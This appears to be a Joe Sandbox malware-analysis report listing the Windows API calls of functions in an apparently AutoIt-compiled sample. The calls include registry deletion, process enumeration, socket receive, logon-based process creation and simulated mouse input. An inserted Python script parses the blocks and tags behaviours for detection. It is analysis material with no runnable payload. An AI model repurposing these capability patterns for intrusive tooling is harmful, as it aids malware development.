                                                                                  • String ID: vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv
                                                                                  • API String ID: 0-1519213456
                                                                                  APIs
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00553DA1
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00553DCB
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00553E80
                                                                                    • Part of subcall function 00553D72: RegCloseKey.ADVAPI32(?), ref: 00553DE8
                                                                                    • Part of subcall function 00553D72: FreeLibrary.KERNEL32(?), ref: 00553E3A
                                                                                    • Part of subcall function 00553D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00553E5D
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00553E25
                                                                                  Similarity
                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                  • String ID:
                                                                                  • API String ID: 395352322-0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00558FE7
                                                                                  • GetWindowLongW.USER32(015CEB50,000000F0), ref: 0055901A
                                                                                  • GetWindowLongW.USER32(015CEB50,000000F0), ref: 0055904F
                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00559081
                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005590AB
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 005590BC
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005590D6
                                                                                  Similarity
                                                                                  • API ID: LongWindow$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 2178440468-0
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005308F2
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00530918
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0053091B
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00530939
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00530942
                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00530967
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00530975
                                                                                  Similarity
                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                  • String ID:
                                                                                  • API String ID: 3761583154-0
                                                                                  • Opcode ID: 2f2e3cdfdbd6500de1428176aca9845cc324516365b90795bb71850ea86dab23
                                                                                  • Instruction ID: 726b6b2c58caedb546825ace1d690aac18934cc671ef2fae2b69fd4d16757e41
                                                                                  • Opcode Fuzzy Hash: 2f2e3cdfdbd6500de1428176aca9845cc324516365b90795bb71850ea86dab23
                                                                                  • Instruction Fuzzy Hash: 80218176601319AFAF109FA8DC88EBB77BCFF09760B008525F919DB191D670EC459B60
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                  • API String ID: 1038674560-2734436370
                                                                                  • Opcode ID: 315437fc32aa327c50577c279aa9cb3ab3b75e7b2ff6ad5d2e167d51c361e866
                                                                                  • Instruction ID: c765384b542a5ede919a400ad7294017aa9417847bbafbf94f0f3b0082dbdfe8
                                                                                  • Opcode Fuzzy Hash: 315437fc32aa327c50577c279aa9cb3ab3b75e7b2ff6ad5d2e167d51c361e866
                                                                                  • Instruction Fuzzy Hash: 22213A32104A1277DA20B6249C16EBB7F98FFA5310F504429F9459B081E7659A82C3A5
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005309CB
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005309F1
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 005309F4
                                                                                  • SysAllocString.OLEAUT32 ref: 00530A15
                                                                                  • SysFreeString.OLEAUT32 ref: 00530A1E
                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00530A38
                                                                                  • SysAllocString.OLEAUT32(?), ref: 00530A46
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                  • String ID:
                                                                                  • API String ID: 3761583154-0
                                                                                  • Opcode ID: 19717903526ac1f606203df73054a7f76c2b55cdb03fb4e44abfa71f2503d895
                                                                                  • Instruction ID: 01f22594a6cb8ca77179ca597e323c94222cad329756c872daa26e23c0b582cb
                                                                                  • Opcode Fuzzy Hash: 19717903526ac1f606203df73054a7f76c2b55cdb03fb4e44abfa71f2503d895
                                                                                  • Instruction Fuzzy Hash: 4E217475200304AFDB109FA8EC89DAA7BFCFF48360B408125F909CB2A1D670EC859764
                                                                                  APIs
                                                                                    • Part of subcall function 0050D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0050D1BA
                                                                                    • Part of subcall function 0050D17C: GetStockObject.GDI32(00000011), ref: 0050D1CE
                                                                                    • Part of subcall function 0050D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0050D1D8
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0055A32D
                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0055A33A
                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0055A345
                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0055A354
                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0055A360
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                  • String ID: Msctls_Progress32
                                                                                  • API String ID: 1025951953-3636473452
                                                                                  • Opcode ID: 677a2ced1c22265b0f178a7ba719c47f5655716c61bd42b2ec174ce00567b7e1
                                                                                  • Instruction ID: 06bb58d83c8f0a288c85bda88d0533f0e24ac873b76995b7210a7964bbf49d1a
                                                                                  • Opcode Fuzzy Hash: 677a2ced1c22265b0f178a7ba719c47f5655716c61bd42b2ec174ce00567b7e1
                                                                                  • Instruction Fuzzy Hash: 791190B1150219BEEF155FA4CC86EEB7F6DFF09798F014215FA08A60A0C6729C25DBA4
                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 0050CCF6
                                                                                  • GetWindowRect.USER32(?,?), ref: 0050CD37
                                                                                  • ScreenToClient.USER32(?,?), ref: 0050CD5F
                                                                                  • GetClientRect.USER32(?,?), ref: 0050CE8C
                                                                                  • GetWindowRect.USER32(?,?), ref: 0050CEA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                  • String ID:
                                                                                  • API String ID: 1296646539-0
                                                                                  • Opcode ID: 1ce1d9f838dcb2833989dcd5cf2c5065d553c12b23e0154689443697ebdb493d
                                                                                  • Instruction ID: d444894666a25a119376e326068c28d82110913a5c660046b548efe91a0db35c
                                                                                  • Opcode Fuzzy Hash: 1ce1d9f838dcb2833989dcd5cf2c5065d553c12b23e0154689443697ebdb493d
                                                                                  • Instruction Fuzzy Hash: FBB1487990024ADBDF10CFA8C5847EEBFB5FF09310F149629EC59AB290DB30A950DB64
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00551C18
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00551C26
                                                                                  • __wsplitpath.LIBCMT ref: 00551C54
                                                                                    • Part of subcall function 00511DFC: __wsplitpath_helper.LIBCMT ref: 00511E3C
                                                                                  • _wcscat.LIBCMT ref: 00551C69
                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00551CDF
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00551CF1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                  • String ID:
                                                                                  • API String ID: 1380811348-0
                                                                                  • Opcode ID: a11ef89bb20edce4a1fb3a1ecef0f981493186bd293a34abb0da56058a9ce807
                                                                                  • Instruction ID: 757683b40c32be11a76c70915da3b89a841a05407e9d5a1bbbde3dc4ac70fad4
                                                                                  • Opcode Fuzzy Hash: a11ef89bb20edce4a1fb3a1ecef0f981493186bd293a34abb0da56058a9ce807
                                                                                  • Instruction Fuzzy Hash: 78518F711043059FD720EF24D885EAFBBE8FF88754F00491EF98A97291DB74A908CB96
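The per-function summary blocks in this report (APIs, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) are regular enough to script against. The Python below is an added example, not code from Joe Sandbox or its IDA plugin: it parses one such block, using the Toolhelp32 process-walk block directly above as its constructed sample input, and tags the function when the CreateToolhelp32Snapshot / Process32FirstW / Process32NextW combination appears. The behaviour-rule names, the `via` field that records "Part of subcall function" entries, and the dataclass layout are conventions chosen for this example; the report itself defines none of them.

```python
"""Parse one Joe Sandbox IDA-plugin function-summary block and tag behaviours."""
import re
from dataclasses import dataclass, field
from typing import Optional

BULLET = "•"

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR" (no argument list).
API_RE = re.compile(
    r"^(?P<name>[\w#]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$"
)
SUBCALL_RE = re.compile(
    r"^Part of subcall function (?P<via>[0-9A-Fa-f]{8}):\s+(?P<rest>.+)$"
)
SOURCE_RE = re.compile(
    r"^Source File:\s+(?P<file>[^,\s]+), Offset:\s+(?P<offset>[0-9A-Fa-f]+),"
    r" based on PE:\s+(?P<pe>true|false)$"
)

# Constructed sample: the Toolhelp32 block from this report, with the page
# indentation and the "Download File" link text removed.
SAMPLE_BLOCK = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00551C18
• Process32FirstW.KERNEL32(00000000,?), ref: 00551C26
• __wsplitpath.LIBCMT ref: 00551C54
  • Part of subcall function 00511DFC: __wsplitpath_helper.LIBCMT ref: 00511E3C
• _wcscat.LIBCMT ref: 00551C69
• Process32NextW.KERNEL32(00000000,?), ref: 00551CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00551CF1
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 1380811348-0
• Opcode ID: a11ef89bb20edce4a1fb3a1ecef0f981493186bd293a34abb0da56058a9ce807
• Instruction ID: 757683b40c32be11a76c70915da3b89a841a05407e9d5a1bbbde3dc4ac70fad4
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str                    # call site address, upper-case hex
    via: Optional[str] = None   # subcall function address for indirect entries


@dataclass
class FunctionSummary:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    source_file: Optional[str] = None
    offset: Optional[int] = None
    based_on_pe: Optional[bool] = None
    associated: list = field(default_factory=list)
    snapshot_file: Optional[str] = None
    similarity: dict = field(default_factory=dict)


def _parse_api(text: str, via: Optional[str] = None) -> Optional[ApiCall]:
    m = API_RE.match(text)
    if not m:
        return None
    args = tuple(a for a in (m["args"] or "").split(",") if a)
    return ApiCall(m["name"], m["module"], args, m["ref"].upper(), via)


def parse_block(block: str) -> FunctionSummary:
    """Section headers are the non-bullet lines; bullets belong to the last header."""
    fs = FunctionSummary()
    section = None
    for raw in block.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith(BULLET):
            section = line
            continue
        item = line[len(BULLET):].strip()
        if section == "APIs":
            sub = SUBCALL_RE.match(item)
            call = _parse_api(sub["rest"], via=sub["via"]) if sub else _parse_api(item)
            if call:
                fs.apis.append(call)
        elif section == "Strings":
            fs.strings.append(item)
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(item)
            if m:
                fs.source_file = m["file"]
                fs.offset = int(m["offset"], 16)
                fs.based_on_pe = m["pe"] == "true"
            elif item.startswith("Associated:"):
                fs.associated.append(item.split(":", 1)[1].strip())
        elif section == "Joe Sandbox IDA Plugin":
            if item.startswith("Snapshot File:"):
                fs.snapshot_file = item.split(":", 1)[1].strip()
        elif section == "Similarity":
            key, _, value = item.partition(":")
            fs.similarity[key.strip()] = value.strip()
    return fs


# Example rules (names are this example's own): every API in the set must be
# called directly from the function, not only via a subcall.
BEHAVIOUR_RULES = {
    "process-enumeration (Toolhelp32 walk)":
        {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "registry-value-enumeration": {"RegOpenKeyExW", "RegEnumValueW"},
    "socket-receive-with-select": {"select", "__WSAFDIsSet"},
}


def direct_api_names(fs: FunctionSummary) -> set:
    return {c.name for c in fs.apis if c.via is None}


def tag_behaviours(fs: FunctionSummary) -> list:
    names = direct_api_names(fs)
    return sorted(tag for tag, needed in BEHAVIOUR_RULES.items() if needed <= names)


if __name__ == "__main__":
    summary = parse_block(SAMPLE_BLOCK)
    for call in summary.apis:
        print(f"{call.ref} {call.name}.{call.module} via={call.via}")
    print(tag_behaviours(summary))
```

Splitting the page into blocks is a matter of cutting at each "APIs" header; the Instruction ID under Similarity is the natural key for de-duplicating functions across snapshots.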
                                                                                  APIs
                                                                                    • Part of subcall function 00553C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00552BB5,?,?), ref: 00553C1D
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005530AF
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005530EF
                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00553112
                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0055313B
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0055317E
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0055318B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                  • String ID:
                                                                                  • API String ID: 3451389628-0
                                                                                  • Opcode ID: dc1f03f26939030008ba9f7039d486547b4002cc4c7dd49c9c429c0c0257ac7c
                                                                                  • Instruction ID: e52643c3ba2bf4a0aaba325ba6e6e4fc21df5e4882f098fbfde31c0cfc15c7cc
                                                                                  • Opcode Fuzzy Hash: dc1f03f26939030008ba9f7039d486547b4002cc4c7dd49c9c429c0c0257ac7c
                                                                                  • Instruction Fuzzy Hash: 08515831108304AFC704EF64C895E6ABBF9FF88344F04491EFA59972A1DB35EA09DB52
                                                                                  APIs
                                                                                  • GetMenu.USER32(?), ref: 00558540
                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00558577
                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0055859F
                                                                                  • GetMenuItemID.USER32(?,?), ref: 0055860E
                                                                                  • GetSubMenu.USER32(?,?), ref: 0055861C
                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0055866D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                  • String ID:
                                                                                  • API String ID: 650687236-0
                                                                                  • Opcode ID: dbe19d0fe594085f5b5c2028dd6e07c45df158a2a243e3d6eb27525cd77d6c15
                                                                                  • Instruction ID: 4d92a42a1dc809c03ce65e5573711913808b637db1c0f4951981ee93aaf1063b
                                                                                  • Opcode Fuzzy Hash: dbe19d0fe594085f5b5c2028dd6e07c45df158a2a243e3d6eb27525cd77d6c15
                                                                                  • Instruction Fuzzy Hash: E9519C71A00219AFCF11EF64C855ABEBBF4BF58310F10445AED06BB351DB74AE458B94
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00534B10
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00534B5B
                                                                                  • IsMenu.USER32(00000000), ref: 00534B7B
                                                                                  • CreatePopupMenu.USER32 ref: 00534BAF
                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00534C0D
                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00534C3E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3311875123-0
                                                                                  • Opcode ID: f63ad4356d98ae7d7eab3030c5d9782de215d5c4fc4dd56305615bb0b697e8df
                                                                                  • Instruction ID: d150a298ed5c6529f995a526a732f0b8a0cba2f95be21103af4773f2dd9f2988
                                                                                  • Opcode Fuzzy Hash: f63ad4356d98ae7d7eab3030c5d9782de215d5c4fc4dd56305615bb0b697e8df
                                                                                  • Instruction Fuzzy Hash: 7351CD7060124AEBDF20CFA8D888BADBFF4BF44318F148159E4159B291E370AD84CF61
                                                                                  APIs
                                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0058DC00), ref: 00548E7C
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00548E89
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00548EAD
                                                                                   • #16.WSOCK32(?,?,00000000,00000000), ref: 00548EC5 (imported by ordinal; WSOCK32 export ordinal 16 is recv)
                                                                                  • _strlen.LIBCMT ref: 00548EF7
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00548F6A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_strlenselect
                                                                                  • String ID:
                                                                                  • API String ID: 2217125717-0
APIs
  • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
• BeginPaint.USER32(?,?,?), ref: 0050AC2A
• GetWindowRect.USER32(?,?), ref: 0050AC8E
• ScreenToClient.USER32(?,?), ref: 0050ACAB
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0050ACBC
• EndPaint.USER32(?,?,?,?,?), ref: 0050AD06
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0056E673
Similarity
• API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
• API String ID: 2592858361-0
APIs
• ShowWindow.USER32(005B1628,00000000,005B1628,00000000,00000000,005B1628,?,0056DC5D,00000000,?,00000000,00000000,00000000,?,0056DAD1,00000004), ref: 0055E40B
• EnableWindow.USER32(00000000,00000000), ref: 0055E42F
• ShowWindow.USER32(005B1628,00000000), ref: 0055E48F
• ShowWindow.USER32(00000000,00000004), ref: 0055E4A1
• EnableWindow.USER32(00000000,00000001), ref: 0055E4C5
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0055E4E8
Similarity
• API ID: Window$Show$Enable$MessageSend
• API String ID: 642888154-0
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 005398D1
  • Part of subcall function 0050F4EA: std::exception::exception.LIBCMT ref: 0050F51E
  • Part of subcall function 0050F4EA: __CxxThrowException@8.LIBCMT ref: 0050F533
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00539908
• EnterCriticalSection.KERNEL32(?), ref: 00539924
• LeaveCriticalSection.KERNEL32(?), ref: 0053999E
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 005399B3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 005399D2
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
• API String ID: 2537439066-0
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,005477F4,?,?,00000000,00000001), ref: 00549B53
  • Part of subcall function 00546544: GetWindowRect.USER32(?,?), ref: 00546557
• GetDesktopWindow.USER32 ref: 00549B7D
• GetWindowRect.USER32(00000000), ref: 00549B84
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00549BB6
  • Part of subcall function 00537A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537AD0
• GetCursorPos.USER32(?), ref: 00549BE2
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00549C44
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• API String ID: 4137160315-0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0052AFAE
• OpenProcessToken.ADVAPI32(00000000), ref: 0052AFB5
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0052AFC4
• CloseHandle.KERNEL32(00000004), ref: 0052AFCF
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0052AFFE
• DestroyEnvironmentBlock.USERENV(00000000), ref: 0052B012
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• API String ID: 1413079979-0
APIs
  • Part of subcall function 0050AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0050AFE3
  • Part of subcall function 0050AF83: SelectObject.GDI32(?,00000000), ref: 0050AFF2
  • Part of subcall function 0050AF83: BeginPath.GDI32(?), ref: 0050B009
  • Part of subcall function 0050AF83: SelectObject.GDI32(?,00000000), ref: 0050B033
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0055EC20
• LineTo.GDI32(00000000,00000003,?), ref: 0055EC34
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0055EC42
• LineTo.GDI32(00000000,00000000,?), ref: 0055EC52
• EndPath.GDI32(00000000), ref: 0055EC62
• StrokePath.GDI32(00000000), ref: 0055EC72
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• API String ID: 43455801-0
APIs
• GetDC.USER32(00000000), ref: 0052E1C0
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0052E1D1
